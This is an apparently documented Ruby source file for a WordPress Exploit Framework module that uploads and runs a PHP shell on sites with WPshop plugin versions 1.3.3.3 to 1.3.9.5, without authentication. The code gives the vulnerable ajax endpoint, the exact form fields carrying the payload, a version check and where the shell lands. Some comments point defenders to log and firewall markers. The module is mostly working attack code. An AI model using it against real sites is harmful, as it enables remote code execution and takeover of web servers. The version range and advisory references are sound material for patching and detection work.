class Wpxf::Exploit::WpshopShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 6
# Registers this module's metadata with the framework.
#
# Runs the parent initializer first, then hands update_info the module
# name, description, credits, external references and date. The
# description names the affected WPshop releases (1.3.3.3 to 1.3.9.5) and
# states that the upload needs no authentication, so anyone triaging a
# site can compare the installed plugin version against that range.
def initialize
  super

  # Adjacent literals joined with a trailing backslash form one string.
  summary = 'This module exploits a file upload vulnerability in versions '\
            '1.3.3.3 to 1.3.9.5 of the WPshop plugin which '\
            'allows unauthenticated users to upload and execute PHP scripts '\
            'in the context of the web server.'

  credits = [
    'g0blin',    # Vulnerability discovery
    'rastating'  # WPXF module
  ]

  # Advisory identifiers for the issue: a WPVDB entry and the original
  # write-up URL.
  advisories = [
    ['WPVDB', '7830'],
    ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
  ]

  update_info(
    name: 'WPshop Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Mar 09 2015'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 27
# Version check for the WPshop plugin, delegated to
# check_plugin_version_from_readme.
#
# The two version strings bracket the range given in the module
# description (1.3.3.3 to 1.3.9.5): 1.3.3.3 is the first affected release
# and 1.3.9.6 is the first release outside the range.
# NOTE(review): the helper's exact argument semantics and return value are
# not visible here; presumably (slug, fixed version, introduced version).
# Confirm against its definition.
def check
  plugin_slug = 'wpshop'
  first_unaffected = '1.3.9.6'
  first_affected = '1.3.3.3'

  check_plugin_version_from_readme(plugin_slug, first_unaffected, first_affected)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 31
# Builds the form body for the upload request and returns the builder.
#
# The body has one plain field, 'elementCode' set to 'ajaxUpload', and one
# file part named 'wpshop_file' holding the encoded payload under
# payload_name. Both names are fixed strings, so on the defensive side they
# are stable markers to look for in request logs or WAF rules covering the
# plugin's ajax endpoint.
def payload_body_builder
  # tap yields the new builder and returns it, so the method's return value
  # is the populated builder itself.
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('elementCode', 'ajaxUpload')
    form.add_file_from_string('wpshop_file', payload.encoded, payload_name)
  end
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 42
# Returns the URI where the uploaded file is expected to be reachable:
# the site's wp-content URL joined with 'uploads' and payload_name.
#
# The file sits directly under the uploads directory. Unexpected script
# files appearing there, or the web server executing PHP from that
# directory, are the conditions a defender would monitor for or disable.
def uploaded_payload_location
  content_root = wordpress_url_wp_content
  normalize_uri(content_root, 'uploads', payload_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 38
# Returns the URI of the plugin endpoint that receives the upload:
# the site's plugins URL joined with 'wpshop/includes/ajax.php'.
#
# The module description states that this upload needs no authentication
# on affected versions, so requests to this path are the ones to review in
# access logs on sites still running WPshop 1.3.3.3 to 1.3.9.5.
def uploader_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'wpshop', 'includes', 'ajax.php')
end